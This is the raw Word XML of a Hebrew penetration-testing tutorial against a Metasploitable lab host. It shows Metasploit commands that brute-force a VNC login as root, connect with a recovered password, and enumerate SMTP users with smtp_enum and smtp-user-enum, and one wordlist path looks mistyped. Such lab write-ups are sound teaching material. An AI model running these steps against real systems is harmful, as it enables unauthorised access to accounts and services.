    <w:p w14:paraId="1B269216" w14:textId="53CECCA5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ניתן לראות שקובץ הסיסמאות כבר מוגדר מראש</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DADAF" w14:textId="2CEFA5B4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נשאר להגדיר </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B4AB82" w14:textId="644EDC59" w:rsidR="00083F15" w:rsidRPr="007D51BF" w:rsidRDefault="00083F15" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>RHOST -192.168.1.157</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE65E78" w14:textId="42B6C030" w:rsidR="00083F15" w:rsidRPr="007D51BF" w:rsidRDefault="00083F15" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>USERNAME – root</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B01A82" w14:textId="20DAFE34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ולהריץ את המודול עם הפקודה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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281EB90" w14:textId="77F7BB9D" w:rsidR="0054583A" w:rsidRPr="007D51BF" w:rsidRDefault="00083F15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24B8A2B" wp14:editId="274C430C">
            <wp:extent cx="6637020" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98" name="תמונה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56F7E" w14:textId="0368F8D9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46656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B8B1BEC" wp14:editId="7AA86CF5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6642338" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="99" name="תמונה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02" cy="12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E118D" w14:textId="74D64D40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6E664453" w14:textId="64A75B5D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244F4A9E" w14:textId="2A68F83A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1807A16A" w14:textId="762E1A69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61B81279" w14:textId="6DA98E30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1CC0A64D" w14:textId="5D932C80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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251847680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DE0D3D9" wp14:editId="20D1665E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6734810" cy="1325880"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="105" name="תמונה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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>אפשר לראות שנמצאה הסיסמא לשרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vnc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2617DA" w14:textId="39252E6A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3E69829E" w14:textId="77777777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496F393A" w14:textId="3D8D4719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68045F" wp14:editId="743B1FBB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4084320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92710</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2377440" cy="266700"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="106" name="מלבן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ADF2F" id="מלבן 106" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:321.6pt;margin-top:7.3pt;width:187.2pt;height:21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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49B1F0" w14:textId="0B1226C5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14F96608" w14:textId="46FF29F2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33910F09" w14:textId="77E89BB9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כעת אפשר לנסות להתחבר ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vnc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עם</w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הכלי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</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vncviewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54611748" w14:textId="410E9FAD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נפתח טרמינל חדש</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E77CF1" w14:textId="7FA04FEF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ונקליד את הפקודה </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8A49D9" w14:textId="36633CF9" w:rsidR="00083F15" w:rsidRPr="007D51BF" w:rsidRDefault="00083F15" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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t>vncviewer 192.168.1.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7AAEAF" w14:textId="4147C436" w:rsidR="00083F15" w:rsidRPr="007D51BF" w:rsidRDefault="00083F15" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE2410" w14:textId="01F28A2A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49728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40F0FF47" wp14:editId="4E7B705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189220" cy="1376483"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="107" name="תמונה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37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BC157" w14:textId="54BE914E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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDD2114" w14:textId="08D59691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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725A5511" w14:textId="6D745B8C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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBE3EAF" w14:textId="790EADCD" w:rsidR="00083F15" w:rsidRPr="007D51BF" w:rsidRDefault="00083F15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3956EA43" w14:textId="77777777" w:rsidR="00F214B6" w:rsidRPr="007D51BF" w:rsidRDefault="00F214B6" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBDF309" w14:textId="64F41161" w:rsidR="00083F15" w:rsidRPr="007D51BF" w:rsidRDefault="00F214B6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50752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="388DC2F4" wp14:editId="226DAF8A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>426720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>300355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6217430" cy="4805674"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="109" name="תמונה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430" cy="480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F15" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ונפתח חלון חדש</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024BA4B0" w14:textId="2AF99D60" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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45173083" w14:textId="25ACEAC2" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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75B6CDCB" w14:textId="0101E33B" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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4076F2ED" w14:textId="2E52332F" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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22826326" w14:textId="7F2270CF" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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674EA464" w14:textId="4F057F72" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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20F72091" w14:textId="43A92095" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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4A53E006" w14:textId="0EC6359A" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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65030C3E" w14:textId="40F98250" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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3F08FE18" w14:textId="5708C00D" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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05BC8AB1" w14:textId="2D216538" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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7534E2AB" w14:textId="08E8A559" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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601BF81C" w14:textId="2C0A2D87" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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1D816857" w14:textId="088C9259" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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13D7116A" w14:textId="3CC3C203" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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3CF6B0E7" w14:textId="5EED5027" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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59111B92" w14:textId="34DB262A" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A18" w:rsidP="00BC1668">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="007D51BF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ostfix </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>smtpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54C375" w14:textId="4C8CAFF0" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A18" w:rsidP="00BC1668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ב</w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הדגמה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הבאה אתמקד על השירות ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smtp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</w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>שהוא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שירות דואר אלקטרוני הפועל בפורט 25</w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. ההתקפה עצמה היא פשוטה מאוד וקלה לביצוע אך מאוד חשובה כי היא מאפשרת לתוקף לחשוף את רשימת המשתמשים </w:t>
      </w:r>
      <w:r w:rsidR="00C0132C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">המורשים </w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ב</w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BC1668" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9905A2" w14:textId="4CE1CE9A" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A05FBCA" w14:textId="227EAF36" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668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נחזור ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD73C0" w14:textId="18DCAA99" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668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ונחפש </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smtp enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB22EF2" w14:textId="120E67E8" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668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הפקודה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search smtp enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E69080B" w14:textId="79A2B015" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668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ונשתמש ב </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auxiliary/scanner/smtp/smtp_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9C767" w14:textId="6F72149C" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668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הפקודה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use auxiliary/scanner/smtp/smtp_enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5039FAF7" w14:textId="3E9DEAE7" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="00BC1668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51776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="124BE833" wp14:editId="5C18E16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44640" cy="807720"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="108" name="תמונה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8FC3C" w14:textId="477343DE" w:rsidR="00FC2A18" w:rsidRPr="007D51BF" w:rsidRDefault="00FC2A1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476F7D5B" w14:textId="7F256D6B" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC166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0A256472" w14:textId="471927D7" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC166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119AA914" w14:textId="44445031" w:rsidR="00BC1668" w:rsidRPr="007D51BF" w:rsidRDefault="00BC1668" w:rsidP="0054583A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נציג את האפשרות </w:t>
      </w:r>
      <w:r w:rsidR="00A7331A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עם הפקודה  </w:t>
      </w:r>
      <w:r w:rsidR="00A7331A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F0DC6" w14:textId="5095869B" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A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ונגדיר את ה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF256ED" w14:textId="563893E9" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A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הפקודה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set RHOSTS 192.168.1.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557C078" w14:textId="42F8D79E" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A" w:rsidP="0054583A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אפשר לראות שמוגדר קובץ יוזרים כברירת מחדל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>USER_FILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D4348" w14:textId="51AA9417" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A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כמובן שניתן לשנות את הקובץ במידת הצורך </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664BF83" w14:textId="6213B644" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A" w:rsidP="00A7331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כרגע אין צורך לשנות לצורך ההדגמה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66365C" w14:textId="32A8BBD4" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A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52800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="624CA396" wp14:editId="294438F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644640" cy="922020"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="110" name="תמונה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83AB9" w14:textId="79B8DCE0" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6830CE32" w14:textId="6008F008" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A" w:rsidP="0054583A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2BA679B" wp14:editId="1503DFC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>502920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>168275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2506980" cy="144780"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="112" name="מלבן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DFA1C" id="מלבן 112" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:39.6pt;margin-top:13.25pt;width:197.4pt;height:11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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F353F9" w14:textId="17E063A8" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A" w:rsidP="0054583A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53824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E70664C" wp14:editId="5F4746CA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6644640" cy="447116"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="111" name="תמונה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4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994AA" w14:textId="1D2EDB7C" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C466CD4" w14:textId="4B84B60C" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00596924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55872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E83A2ED" wp14:editId="2CFA5A6C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-365760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>287655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7137926" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="114" name="תמונה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998" cy="44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31A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ונשאר רק להריץ את המתקפה עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="00A7331A" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC94BD6" w14:textId="01BA3413" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A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1D1B7900" w14:textId="53B69344" w:rsidR="00A7331A" w:rsidRPr="007D51BF" w:rsidRDefault="00A7331A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1E3C81A7" w14:textId="6C1AE513" w:rsidR="00C21063" w:rsidRPr="007D51BF" w:rsidRDefault="00C21063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ונוכל לראות את רשימת המשתמשים במוגדרים.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3065B" w14:textId="0F4D21FC" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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1F649C6A" w14:textId="552F74DC" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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0472AB7F" w14:textId="3E29EA33" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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690A6FCE" w14:textId="50702467" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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793152D7" w14:textId="7EE56BAE" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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0E31EFC1" w14:textId="3810C5F1" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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lastRenderedPageBreak/>
        <w:t xml:space="preserve">דרך נוספת לחושף את רשימת המשמשים יכולה להעשות בדרך ידנית עם הכלי </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smtp-user-enum</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76868610" w14:textId="4E39F707" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482" w:rsidP="0054583A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הפקודה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smtp-user-enum</w:t>
      </w:r>
      <w:r w:rsidR="0016437C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -M VRFY /user/share/wordlist/fern-wifi/common.txt -t 192.168.1.161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40265B93" w14:textId="007A4F25" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="0016437C" w:rsidP="0016437C">
      <w:pPr>
        <w:jc w:val="right"/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t xml:space="preserve"> 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סוג השיטה (ברירת מחדל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VRFY</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
